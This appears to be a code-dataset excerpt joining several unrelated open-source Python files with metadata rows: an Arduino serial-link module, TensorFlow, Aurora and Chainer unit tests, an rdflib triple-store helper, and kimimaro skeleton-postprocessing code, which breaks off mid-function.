import time
import serial
import struct
import global_data
import record_mode
TRANSMIT_DELAY = 0.08 # SECONDS
# SET TO FALSE FOR TESTING WITHOUT ARDUINO
TRANSMIT = True
# THIS WILL GET ASSIGNED DURING INITIALIZATION
CONNECTION = None
##############################
# INITIALIZE COM #
##############################
# INITIALIZE SERIAL CONNECTION
def initialize():
global CONNECTION
if (TRANSMIT):
if (os.name == 'posix'):
port_name = '/dev/ttyACM0'
else:
port_name = 'COM4'
CONNECTION = serial.Serial(
port=port_name,
baudrate=9600,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=0 # don't block when reading
)
##############################
# CLOSE COM #
##############################
# PROBABLY NEVER NEED TO CALL THIS
def close():
CONNECTION.close
##############################
# TRANSMIT #
##############################
# DIGITAL TX
# 2 DIGITAL PINS SO pin_index IN [0,1]
# BINARY STATE SO value IN [True, False]
def tx_digital(pin_index, value):
if (not isinstance(value, bool)):
sys.exit("Non-boolean value arg to tx_digital")
packed = struct.pack('!cB?', 'd', pin_index, value)
if (global_data.record):
record_mode.append_instruction(('d', pin_index, value))
if (TRANSMIT):
CONNECTION.write(packed)
if (pin_index == 0):
global_data.digital_0_sent = value
elif (pin_index == 1):
global_data.digital_1_sent = value
#receive()
# ANALOG TX
# 2 ANALOG PINS SO pin_index IN [0,1]
# value IN [0, 255]
def tx_analog(pin_index, value):
if (not isinstance(value, int)):
sys.exit("Non-int value arg to tx_digital: {}".format(value))
packed = struct.pack('!cBB', 'a', pin_index, value)
if (global_data.record):
record_mode.append_instruction(('a', pin_index, value))
if (TRANSMIT):
CONNECTION.write(packed)
if (pin_index == 0):
global_data.analog_0_sent = value
elif (pin_index == 1):
global_data.analog_1_sent = value
#receive()
# GAIT TX
def tx_gait(event_list):
packed = struct.pack('!c', 't')
if (TRANSMIT):
CONNECTION.write(packed)
for event in event_list:
time.sleep(TRANSMIT_DELAY)
packed = struct.pack('!BLBB', event['motor_index'], event['activation_time'], event['direction'], event['pwm'])
if (TRANSMIT):
CONNECTION.write(packed)
#print CONNECTION.readline()
#def tx_reset():
# packed = struct.pack('!c', 'r')
# if (TRANSMIT):
# CONNECTION.write(packed)
##############################
# RECEIVE #
##############################
# READ RESPONSE FROM ARDUINO AND
# SET VARIABLES IN global_data.py
def receive():
line = CONNECTION.readline()
if (len(line) > 0):
sys.stdout.write(line);
#print line;
| mit | -8,217,914,187,891,279,000 | 23.674603 | 119 | 0.548729 | false |
pierreg/tensorflow | tensorflow/contrib/graph_editor/tests/util_test.py | 28 | 5696 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.contrib.graph_editor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import graph_editor as ge
class UtilTest(tf.test.TestCase):
def test_list_view(self):
"""Test for ge.util.ListView."""
l = [0, 1, 2]
lv = ge.util.ListView(l)
# Should not be the same id.
self.assertIsNot(l, lv)
# Should behave the same way than the original list.
self.assertTrue(len(lv) == 3 and lv[0] == 0 and lv[1] == 1 and lv[2] == 2)
# Should be read only.
with self.assertRaises(TypeError):
lv[0] = 0
def test_is_iterable(self):
"""Test for ge.util.is_iterable."""
self.assertTrue(ge.util.is_iterable([0, 1, 2]))
self.assertFalse(ge.util.is_iterable(3))
def test_unique_graph(self):
"""Test for ge.util.check_graphs and ge.util.get_unique_graph."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
g1 = tf.Graph()
with g1.as_default():
a1 = tf.constant(1)
b1 = tf.constant(2)
# Same graph, should be fine.
self.assertIsNone(ge.util.check_graphs(a0, b0))
# Two different graphs, should assert.
with self.assertRaises(ValueError):
ge.util.check_graphs(a0, b0, a1, b1)
# a0 and b0 belongs to the same graph, should be fine.
self.assertEqual(ge.util.get_unique_graph([a0, b0]), g0)
# Different graph, should raise an error.
with self.assertRaises(ValueError):
ge.util.get_unique_graph([a0, b0, a1, b1])
def test_make_list_of_op(self):
"""Test for ge.util.make_list_of_op."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
# Should extract the ops from the graph.
self.assertEqual(len(ge.util.make_list_of_op(g0)), 2)
# Should extract the ops from the tuple.
self.assertEqual(len(ge.util.make_list_of_op((a0.op, b0.op))), 2)
def test_make_list_of_t(self):
"""Test for ge.util.make_list_of_t."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
c0 = tf.add(a0, b0) # pylint: disable=unused-variable
# Should extract the tensors from tre graph.
self.assertEqual(len(ge.util.make_list_of_t(g0)), 3)
# Should extract the tensors from the tuple
self.assertEqual(len(ge.util.make_list_of_t((a0, b0))), 2)
# Should extract the tensors and ignore the ops.
self.assertEqual(
len(ge.util.make_list_of_t((a0, a0.op, b0), ignore_ops=True)), 2)
def test_get_generating_consuming(self):
"""Test for ge.util.get_generating_ops and ge.util.get_generating_ops."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
c0 = tf.add(a0, b0)
self.assertEqual(len(ge.util.get_generating_ops([a0, b0])), 2)
self.assertEqual(len(ge.util.get_consuming_ops([a0, b0])), 1)
self.assertEqual(len(ge.util.get_generating_ops([c0])), 1)
self.assertEqual(ge.util.get_consuming_ops([c0]), [])
def test_control_outputs(self):
"""Test for the ge.util.ControlOutputs class."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
x0 = tf.constant(3)
with tf.control_dependencies([x0.op]):
c0 = tf.add(a0, b0) # pylint: disable=unused-variable
control_outputs = ge.util.ControlOutputs(g0).get_all()
self.assertEqual(len(control_outputs), 1)
self.assertEqual(len(control_outputs[x0.op]), 1)
self.assertIs(list(control_outputs[x0.op])[0], c0.op)
def test_scope(self):
"""Test simple path scope functionalities."""
self.assertEqual(ge.util.scope_finalize("foo/bar"), "foo/bar/")
self.assertEqual(ge.util.scope_dirname("foo/bar/op"), "foo/bar/")
self.assertEqual(ge.util.scope_basename("foo/bar/op"), "op")
def test_placeholder(self):
"""Test placeholder functionalities."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1, name="foo")
# Test placeholder name.
self.assertEqual(ge.util.placeholder_name(a0), "geph__foo_0")
self.assertEqual(ge.util.placeholder_name(None), "geph")
self.assertEqual(
ge.util.placeholder_name(a0, scope="foo/"), "foo/geph__foo_0")
self.assertEqual(
ge.util.placeholder_name(a0, scope="foo"), "foo/geph__foo_0")
self.assertEqual(ge.util.placeholder_name(None, scope="foo/"), "foo/geph")
self.assertEqual(ge.util.placeholder_name(None, scope="foo"), "foo/geph")
# Test placeholder creation.
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1, dtype=tf.float32, name="a0")
c0 = tf.add(
ge.util.make_placeholder_from_tensor(a0),
ge.util.make_placeholder_from_dtype_and_shape(dtype=tf.float32))
self.assertEqual(c0.op.inputs[0].op.name, "geph__a0_0")
self.assertEqual(c0.op.inputs[1].op.name, "geph")
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 4,765,823,526,182,708,000 | 37.228188 | 80 | 0.642381 | false |
WimPessemier/OntoManager | ontomanager/ontomanager/triplestore.py | 1 | 4899 | """
Module containing some functions related to the triple store (the global graph).
"""
import os
import rdflib
import fnmatch
import context
from logging import DEBUG, INFO, ERROR
import pprint
PPRINTER = pprint.PrettyPrinter(depth=6)
###################################################################################################
# the global instance of the graph. Should not be accessed directly outside this module.
__global_graph__ = None
###################################################################################################
def GET_GRAPH():
"""
Get a reference to the global graph.
"""
return __global_graph__
def CREATE_GRAPH():
"""
Create the global graph.
"""
global __global_graph__
try:
__global_graph__ = rdflib.ConjunctiveGraph()
except:
__global_graph__ = rdflib.graph.ConjunctiveGraph()
def CLEAR_GRAPH():
"""
Clear the global graph.
"""
global __global_graph__
INFO("CLEARING (triples: %d)" %len(__global_graph__))
CREATE_GRAPH()
INFO("CLEARED (triples: %d)" %len(__global_graph__))
def LOAD_MINIMAL_CONTEXT():
"""
Load the minimal context, so that the queries defined in the templates get a meaning
(and don't raise exceptions because of unknown namespaces"
An example of a context item is:
prefix "sys" = Namespace("http://www.mercator.iac.es/onto/metamodels/systems"))
"""
global __global_graph__
for (prefix,uri) in context.MINIMAL_CONTEXT.items():
__global_graph__.namespace_manager.bind(prefix, rdflib.namespace.Namespace(uri))
def FIND_FILES(directory, pattern):
"""
Find the files that match a given pattern, in a given directory.
"""
for root, dirs, files in os.walk(directory):
for basename in files:
if fnmatch.fnmatch(basename, pattern):
filename = os.path.join(root, basename)
yield filename
def CONTEXT():
"""
Get the context of the global graph, as a dictionary of key=prefix and value=URI.
"""
global __global_graph__
d = {}
for prefix, uri in __global_graph__.namespace_manager.namespaces():
d[prefix] = uri
return d
def LOG_CONTEXT():
"""
Log the context as INFO.
"""
global __global_graph__
INFO("CONTEXT:")
c = CONTEXT()
for prefix, uri in c.items():
INFO(" %s : %s" %(prefix, uri))
INFO("TRIPLES LOADED: %d" %len(__global_graph__))
def QUERY(text):
"""
Execute a query.
"""
strippedText = text.strip()
for line in strippedText.split('\n'):
DEBUG(" %s" %line)
results = __global_graph__.query(strippedText)
DEBUG("Results:")
if len(results) >0:
for result in results:
DEBUG(result)
else:
DEBUG(" 0 found")
if results is None:
results = []
return results
def URI_TO_QNAME(uri):
"""
Convert the given URI to a qname, using the context of the global graph.
"""
try:
if str(uri).find("://"):
return __global_graph__.namespace_manager.qname(unicode(str(uri)))
else:
raise Exception("Doesn't appear to be a valid URI!")
except Exception, e:
raise Exception("Couldn't convert '%s' to a QName: %s" %(uri,e))
def URI_TO_IDENTIFIER(uri):
"""
Return the identifier part of an URI (e.g. return 'b' for 'http://blabla.com/bla#b').
"""
separator = str(uri).find('#')
if separator > 0:
return str(uri)[separator + 1:]
else:
raise Exception("URI %s doesn't contain an identifier" %uri)
def QNAME_TO_URI(qname):
"""
Convert the given qname to an URI, based on the context of the global graph.
"""
for prefix, uri in __global_graph__.namespace_manager.namespaces():
if qname.find(prefix + ":") == 0:
return uri + qname[len(prefix)+1:]
else:
raise Exception("QName %s is unknown" %qname)
def IS_QNAME(x):
"""
Check if the given string is a qname.
"""
return len(x.split(':')) == 2
def IS_URI(x):
"""
Check if the given string is an URI.
"""
return isinstance(x, rdflib.URIRef)
def IS_LITERAL(x):
"""
Check if the given string is a literal.
"""
return isinstance(x, rdflib.Literal)
def PARSE_FOR_URI(s):
"""
Convert URI occurrences in a string to an HTML hyperlink for the browse view.
"""
# max 10 iterations:
for i in xrange(10):
httpStart = s.find("http://")
if httpStart > 0:
httpEnd = s.find(" ", httpStart)
if httpEnd < 0:
httpEnd = len(s)
uri = s[httpStart:httpEnd]
qname = URI_TO_QNAME(uri)
html = "<a href=browse?show;qname=%s>%s</a>" %(qname,qname)
s = s.replace(uri, html)
else:
break
return s
| gpl-3.0 | -132,449,730,624,846,110 | 24.252577 | 99 | 0.564809 | false |
kidaa/aurora | src/test/python/apache/aurora/client/cli/test_command_hooks.py | 7 | 5573 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from mock import patch
from twitter.common.contextutil import temporary_file
from apache.aurora.client.cli.client import AuroraCommandLine
from apache.aurora.client.cli.command_hooks import CommandHook, GlobalCommandHookRegistry
from apache.aurora.config import AuroraConfig
from .util import AuroraClientCommandTest, FakeAuroraCommandContext
from gen.apache.aurora.api.ttypes import (
JobKey,
Result,
ScheduleStatus,
ScheduleStatusResult,
TaskQuery
)
class HookForTesting(CommandHook):
def __init__(self, succeed):
self.succeed = succeed
self.ran_pre = False
self.ran_post = False
@property
def name(self):
return "test_hook"
def get_nouns(self):
return ["job"]
def get_verbs(self, noun):
if noun == "job":
return ["create", "status"]
else:
return []
def pre_command(self, noun, verb, context, commandline):
self.ran_pre = True
if self.succeed:
return 0
else:
return 1
def post_command(self, noun, verb, context, commandline, result):
self.ran_post = True
class TestClientCreateCommand(AuroraClientCommandTest):
@classmethod
def create_mock_status_query_result(cls, scheduleStatus):
query_result = cls.create_simple_success_response()
if scheduleStatus == ScheduleStatus.INIT:
# status query result for before job is launched.
tasks = []
else:
task_one = cls.create_scheduled_task(0, initial_time=1000, status=scheduleStatus)
task_two = cls.create_scheduled_task(1, initial_time=1004, status=scheduleStatus)
tasks = [task_one, task_two]
query_result.result = Result(scheduleStatusResult=ScheduleStatusResult(tasks=tasks))
return query_result
@classmethod
def create_query(cls):
return TaskQuery(
jobKeys=[JobKey(role=cls.TEST_ROLE, environment=cls.TEST_ENV, name=cls.TEST_JOB)])
@classmethod
def get_createjob_response(cls):
# Then, we call api.create_job(config)
return cls.create_simple_success_response()
@classmethod
def assert_create_job_called(cls, mock_api):
# Check that create_job was called exactly once, with an AuroraConfig parameter.
assert mock_api.create_job.call_count == 1
assert isinstance(mock_api.create_job.call_args_list[0][0][0], AuroraConfig)
@classmethod
def assert_scheduler_called(cls, mock_api, mock_query, num_queries):
assert mock_api.scheduler_proxy.getTasksWithoutConfigs.call_count == num_queries
mock_api.scheduler_proxy.getTasksWithoutConfigs.assert_called_with(mock_query)
def test_create_job_with_successful_hook(self):
GlobalCommandHookRegistry.reset()
command_hook = HookForTesting(True)
GlobalCommandHookRegistry.register_command_hook(command_hook)
mock_context = FakeAuroraCommandContext()
with patch("apache.aurora.client.cli.jobs.Job.create_context", return_value=mock_context):
mock_query = self.create_query()
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.INIT))
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.RUNNING))
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.RUNNING))
mock_context.get_api("west").check_status.side_effect = (
lambda x: self.create_mock_status_query_result(ScheduleStatus.RUNNING))
api = mock_context.get_api("west")
api.create_job.return_value = self.get_createjob_response()
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(["job", "create", "--wait-until=RUNNING", "west/bozo/test/hello",
fp.name])
self.assert_create_job_called(api)
self.assert_scheduler_called(api, mock_query, 1)
assert command_hook.ran_pre
assert command_hook.ran_post
def test_create_job_with_failed_hook(self):
GlobalCommandHookRegistry.reset()
command_hook = HookForTesting(False)
GlobalCommandHookRegistry.register_command_hook(command_hook)
mock_context = FakeAuroraCommandContext()
with patch("apache.aurora.client.cli.jobs.Job.create_context", return_value=mock_context):
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.INIT))
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.RUNNING))
api = mock_context.get_api("west")
api.create_job.return_value = self.get_createjob_response()
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
result = cmd.execute(["job", "create", "--wait-until=RUNNING", "west/bozo/test/hello",
fp.name])
assert result == 1
assert api.create_job.call_count == 0
assert command_hook.ran_pre
assert not command_hook.ran_post
| apache-2.0 | 11,837,275,848,459,540 | 35.664474 | 94 | 0.708774 | false |
hvy/chainer | tests/chainer_tests/functions_tests/evaluation_tests/test_accuracy.py | 6 | 4114 | import unittest
import numpy
import six
import chainer
from chainer.backends import cuda
from chainer import functions
from chainer import testing
from chainer.testing import attr
from chainer.utils import force_array
from chainer.utils import type_check
def accuracy(x, t, ignore_label):
x_ = numpy.rollaxis(x, 1, x.ndim).reshape(t.size, -1)
t_ = t.ravel()
if ignore_label is not None:
count = 0
for i in six.moves.range(t_.size):
pred = x_[i].argmax()
if t_[i] != ignore_label and pred == t_[i]:
count += 1
total = (t_ != ignore_label).sum()
else:
count = 0
for i in six.moves.range(t_.size):
pred = x_[i].argmax()
if pred == t_[i]:
count += 1
total = t_.size
if total == 0:
return 0.0
else:
return float(count) / total
@testing.parameterize(
*testing.product_dict(
[{'x_shape': (10, 3), 't_shape': (10,)},
{'x_shape': (10, 3, 1), 't_shape': (10,)},
{'x_shape': (10, 3, 1, 1), 't_shape': (10,)},
{'x_shape': (10, 3, 5), 't_shape': (10, 5)},
{'x_shape': (10, 3, 5, 4), 't_shape': (10, 5, 4)},
{'x_shape': (10, 3, 5, 4, 1), 't_shape': (10, 5, 4)},
{'x_shape': (10, 3, 5, 4, 1, 1), 't_shape': (10, 5, 4)}],
[{'ignore_label': None, 't_data': 'randint'},
{'ignore_label': 0, 't_data': 'randint'},
{'ignore_label': 0, 't_data': 'zero'}],
[{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}],
[{'label_dtype': numpy.int8},
{'label_dtype': numpy.int16},
{'label_dtype': numpy.int32},
{'label_dtype': numpy.int64}]
)
)
@testing.fix_random()
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
class TestAccuracy(testing.FunctionTestCase):
def setUp(self):
self.skip_backward_test = True
self.skip_double_backward_test = True
if self.dtype == numpy.float16:
self.check_forward_options.update({'atol': 1e-4, 'rtol': 1e-3})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.x_shape).astype(self.dtype)
if self.t_data == 'randint':
t = numpy.random.randint(
3, size=self.t_shape).astype(self.label_dtype)
elif self.t_data == 'zero':
t = numpy.zeros(self.t_shape).astype(self.label_dtype)
return x, t
def forward(self, inputs, device):
x, t = inputs
return functions.accuracy(x, t, self.ignore_label),
def forward_expected(self, inputs):
x, t = inputs
expected = accuracy(x, t, self.ignore_label)
expected = force_array(expected, self.dtype)
return expected,
@testing.parameterize(
{'x_shape': (10, 3), 't_shape': (4,)},
{'x_shape': (10, 3, 2), 't_shape': (10,)},
{'x_shape': (10, 3, 1, 2), 't_shape': (10,)},
{'x_shape': (10, 3, 4), 't_shape': (10, 5)},
{'x_shape': (10, 3, 5, 2), 't_shape': (10, 5)},
{'x_shape': (10, 3, 5, 1, 2), 't_shape': (10, 5)},
)
class TestInvalidShape(unittest.TestCase):
def setUp(self):
self.x = numpy.random.uniform(-1, 1,
self.x_shape).astype(numpy.float32)
self.t = numpy.random.randint(3, size=self.t_shape).astype(numpy.int32)
def check_invalid_shape(self, xp):
x = chainer.Variable(xp.asarray(self.x))
t = chainer.Variable(xp.asarray(self.t))
with self.assertRaises(type_check.InvalidType):
functions.accuracy(x, t)
def test_invalid_shape_cpu(self):
self.check_invalid_shape(numpy)
@attr.gpu
def test_invalid_shape_gpu(self):
self.check_invalid_shape(cuda.cupy)
testing.run_module(__name__, __file__)
| mit | 8,064,799,634,941,198,000 | 29.029197 | 79 | 0.533787 | false |
seung-lab/kimimaro | kimimaro/postprocess.py | 1 | 19044 | """
Postprocessing for joining skeletons chunks generated by
skeletonizing adjacent image chunks.
Authors: Alex Bae and Will Silversmith
Affiliation: Seung Lab, Princeton Neuroscience Institue
Date: June 2018 - June 2019
This file is part of Kimimaro.
Kimimaro is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Kimimaro is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Kimimaro. If not, see <https://www.gnu.org/licenses/>.
"""
from collections import defaultdict
import networkx as nx
import numpy as np
from scipy import spatial
from scipy.sparse import lil_matrix
from scipy.sparse.csgraph import dijkstra
import scipy.sparse.csgraph as csgraph
import scipy.spatial.distance
from cloudvolume import Skeleton, Bbox
import kimimaro.skeletontricks
## Public API of Module
def postprocess(skeleton, dust_threshold=1500, tick_threshold=3000):
"""
Postprocessing of a skeleton enables aggregation of adjacent
or overlapping skeletonized image chunks to be fused into a
single coherent skeleton.
The following steps are applied:
1) Remove disconnected components smaller than the
dust threshold (measured in physical distance).
2) Skeletons are supposed to be trees, so we remove
any loops that were introduced by joining chunks
together. Loops that occur inside the lumen of a
neuron might be collapsed into their centroid. Loops
that occur due to, e.g. mergers are broken arbitarily.
3) Disconnected components that are closer than the sum
of their boundary distance are connected.
4) Small "ticks", or branches from the main skeleton, are
removed one at a time, from smallest to largest. Branches
larger than the physical tick_threshold are preserved.
Returns: Skeleton
"""
label = skeleton.id
# necessary for removing trivial loops etc
# remove_loops and remove_ticks assume a
# clean representation
skeleton = skeleton.consolidate()
skeleton = remove_dust(skeleton, dust_threshold)
skeleton = remove_loops(skeleton)
skeleton = connect_pieces(skeleton)
skeleton = remove_ticks(skeleton, tick_threshold)
skeleton.id = label
return skeleton.consolidate()
def join_close_components(skeletons, radius=None):
"""
Given a set of skeletons which may contain multiple connected components,
attempt to connect each component to the nearest other component via the
nearest two vertices. Repeat until no components remain or no points closer
than `radius` are available.
radius: float in same units as skeletons
Returns: Skeleton
"""
if radius is not None and radius <= 0:
raise ValueError("radius must be greater than zero: " + str(radius))
if isinstance(skeletons, Skeleton):
skeletons = [ skeletons ]
skels = []
for skeleton in skeletons:
skels += skeleton.components()
skels = [ skl.consolidate() for skl in skels if not skl.empty() ]
if len(skels) == 1:
return skels[0]
elif len(skels) == 0:
return Skeleton()
while len(skels) > 1:
N = len(skels)
radii_matrix = np.zeros( (N, N), dtype=np.float32 ) + np.inf
index_matrix = np.zeros( (N, N, 2), dtype=np.uint32 ) + -1
for i in range(len(skels)):
for j in range(len(skels)):
if i == j:
continue
elif radii_matrix[i,j] != np.inf:
continue
s1, s2 = skels[i], skels[j]
dist_matrix = scipy.spatial.distance.cdist(s1.vertices, s2.vertices)
radii_matrix[i,j] = np.min(dist_matrix)
radii_matrix[j,i] = radii_matrix[i,j]
index_matrix[i,j] = np.unravel_index( np.argmin(dist_matrix), dist_matrix.shape )
index_matrix[j,i] = index_matrix[i,j]
if np.all(radii_matrix) == np.inf:
break
min_radius = np.min(radii_matrix)
if radius is not None and min_radius > radius:
break
i, j = np.unravel_index( np.argmin(radii_matrix), radii_matrix.shape )
s1, s2 = skels[i], skels[j]
fused = Skeleton.simple_merge([s1, s2])
fused.edges = np.concatenate([
fused.edges,
[[ index_matrix[i,j,0], index_matrix[i,j,1] + s1.vertices.shape[0] ]]
])
skels[i] = None
skels[j] = None
skels = [ _ for _ in skels if _ is not None ] + [ fused ]
return Skeleton.simple_merge(skels).consolidate()
## Implementation Details Below
def combination_pairs(n):
pairs = np.array([])
for i in range(n):
for j in range(n-i-1):
pairs = np.concatenate((pairs, np.array([i, i+j+1 ])))
pairs = np.reshape(pairs,[ pairs.shape[0] // 2, 2 ])
return pairs.astype(np.uint16)
def find_connected(nodes, edges):
s = nodes.shape[0]
nodes = np.unique(edges).astype(np.uint32)
conn_mat = lil_matrix((s, s), dtype=bool)
conn_mat[edges[:,0], edges[:,1]] = 1
n, l = csgraph.connected_components(conn_mat, directed=False)
l_nodes = l[nodes]
l_list = np.unique(l_nodes)
return [ l == i for i in l_list ]
def remove_dust(skeleton, dust_threshold):
"""Dust threshold in physical cable length."""
if skeleton.empty() or dust_threshold == 0:
return skeleton
skels = []
for skel in skeleton.components():
if skel.cable_length() > dust_threshold:
skels.append(skel)
return Skeleton.simple_merge(skels)
def connect_pieces(skeleton):
if skeleton.empty():
return skeleton
nodes = skeleton.vertices
edges = skeleton.edges
radii = skeleton.radii
all_connected = True
while all_connected:
connected = find_connected(nodes, edges)
pairs = combination_pairs(len(connected))
all_connected = False
for i in range(pairs.shape[0]):
path_piece = connected[pairs[i,0]]
nodes_piece = nodes[path_piece].astype(np.float32)
nodes_piece_idx = np.where(path_piece)[0]
path_tree = connected[pairs[i,1]]
nodes_tree = nodes[path_tree]
nodes_tree_idx = np.where(path_tree)[0]
tree = spatial.cKDTree(nodes_tree)
(dist, idx) = tree.query(nodes_piece)
min_dist = np.min(dist)
min_dist_idx = int(np.where(dist == min_dist)[0][0])
start_idx = nodes_piece_idx[min_dist_idx]
end_idx = nodes_tree_idx[idx[min_dist_idx]]
# test if line between points exits object
if (radii[start_idx] + radii[end_idx]) >= min_dist:
new_edge = np.array([[ start_idx, end_idx ]])
edges = np.concatenate((edges, new_edge), axis=0)
all_connected = True
break
skeleton.edges = edges
return skeleton
def remove_ticks(skeleton, threshold):
"""
Simple merging of individual TESAR cubes results in lots of little
ticks due to the edge effect. We can remove them by thresholding
the path length from a given branch to the "main body" of the neurite.
We successively remove paths from shortest to longest until no branches
below threshold remain.
If TEASAR parameters were chosen such that they allowed for spines to
be traced, this is also an opportunity to correct for that.
This algorithm is O(N^2) in the number of terminal nodes.
Parameters:
threshold: The maximum length in nanometers that may be culled.
Returns: tick free skeleton
"""
if skeleton.empty() or threshold == 0:
return skeleton
skels = []
for component in skeleton.components():
skels.append(_remove_ticks(component, threshold))
return Skeleton.simple_merge(skels).consolidate(remove_disconnected_vertices=False)
def _remove_ticks(skeleton, threshold):
"""
For a single connected component, remove "ticks" below a threshold.
Ticks are a path connecting a terminal node to a branch point that
are physically shorter than the specified threshold.
Every time a tick is removed, it potentially changes the topology
of the components. Once a branch point's number of edges drops to
two, the two paths connecting to it can be unified into one. Sometimes
a single object exists that has no branches but is below threshold. We
do not delete these objects as there would be nothing left.
Each time the minimum length tick is removed, it can change which
tick is the new minimum tick and requires reevaluation of the whole
skeleton. Previously, we did not perform this reevaluation and it
resulted in the ends of neurites being clipped.
This makes the algorithm quadratic in the number of terminal branches.
As high resolution skeletons can have tens of thousands of nodes and
dozens of branches, a full topological reevaluation becomes relatively
expensive. However, we only need to know the graph of distances between
critical points, defined as the set of branch points and terminal points,
in the skeleton in order to evaluate the topology.
Therefore, we first compute this distance graph before proceeding with
tick removal. The algorithm remains quadratic in the number of terminal
points, but the constant speed up is very large as we move from a regime
of tens of thousands to hundreds of thousands of points needing reevaluation
to at most hundreds and often only a handful in typical cases. In the
pathological case of a skeleton with numerous single point extrusions,
the performance of the algorithm collapses approximately to the previous
regime (though without the assistence of the constant factor of numpy speed).
Requires:
skeleton: a Skeleton that is guaranteed to be a single
connected component.
threshold: distance in nanometers below which a branch is considered
a "tick" eligible to be removed.
Returns: a "tick" free Skeleton
"""
if skeleton.empty():
return skeleton
dgraph = kimimaro.skeletontricks.create_distance_graph(skeleton)
vertices = skeleton.vertices
edges = skeleton.edges
unique_nodes, unique_counts = np.unique(edges, return_counts=True)
terminal_nodes = set(unique_nodes[ unique_counts == 1 ])
branch_idx = np.where(unique_counts >= 3)[0]
branch_counts = defaultdict(int)
for i in branch_idx:
branch_counts[unique_nodes[i]] = unique_counts[i]
G = nx.Graph()
G.add_edges_from(edges)
terminal_superedges = set([ edg for edg in dgraph.keys() if (edg[0] in terminal_nodes or edg[1] in terminal_nodes) ])
def fuse_edge(edg1):
unify = [ edg for edg in dgraph.keys() if edg1 in edg ]
new_dist = 0.0
for edg in unify:
terminal_superedges.discard(edg)
new_dist += dgraph[edg]
del dgraph[edg]
unify = set([ item for sublist in unify for item in sublist ])
unify.remove(edg1)
dgraph[tuple(unify)] = new_dist
terminal_superedges.add(tuple(unify))
branch_counts[edg1] = 0
while len(dgraph) > 1:
min_edge = min(terminal_superedges, key=dgraph.get)
e1, e2 = min_edge
if branch_counts[e1] == 1 and branch_counts[e2] == 1:
break
elif dgraph[min_edge] >= threshold:
break
path = nx.shortest_path(G, e1, e2)
path = [ (path[i], path[i+1]) for i in range(len(path) - 1) ]
G.remove_edges_from(path)
del dgraph[min_edge]
terminal_superedges.remove(min_edge)
branch_counts[e1] -= 1
branch_counts[e2] -= 1
if branch_counts[e1] == 2:
fuse_edge(e1)
if branch_counts[e2] == 2:
fuse_edge(e2)
skel = skeleton.clone()
skel.edges = np.array(list(G.edges), dtype=np.uint32)
return skel
def _create_distance_graph(skeleton):
"""
Creates the distance "supergraph" from a single connected component
skeleton as described in _remove_ticks.
Returns: a distance "supergraph" describing the physical distance
between the critical points in the skeleton's structure.
Example skeleton with output:
60nm 60nm 60nm
1------2------3------4
30nm | 70nm \
5 ----6
{
(1,2): 60,
(2,3): 60,
(2,5): 30,
(3,4): 60,
(3,6): 70,
}
"""
vertices = skeleton.vertices
edges = skeleton.edges
unique_nodes, unique_counts = np.unique(edges, return_counts=True)
terminal_nodes = unique_nodes[ unique_counts == 1 ]
branch_nodes = set(unique_nodes[ unique_counts >= 3 ])
critical_points = set(terminal_nodes)
critical_points.update(branch_nodes)
tree = defaultdict(set)
for e1, e2 in edges:
tree[e1].add(e2)
tree[e2].add(e1)
# The below depth first search would be
# more elegantly implemented as recursion,
# but it quickly blows the stack, mandating
# an iterative implementation.
stack = [ terminal_nodes[0] ]
parents = [ -1 ]
dist_stack = [ 0.0 ]
root_stack = [ terminal_nodes[0] ]
distgraph = defaultdict(float) # the distance "supergraph"
while stack:
node = stack.pop()
dist = dist_stack.pop()
root = root_stack.pop()
parent = parents.pop()
if node in critical_points and node != root:
distgraph[ (root, node) ] = dist
dist = 0.0
root = node
for child in tree[node]:
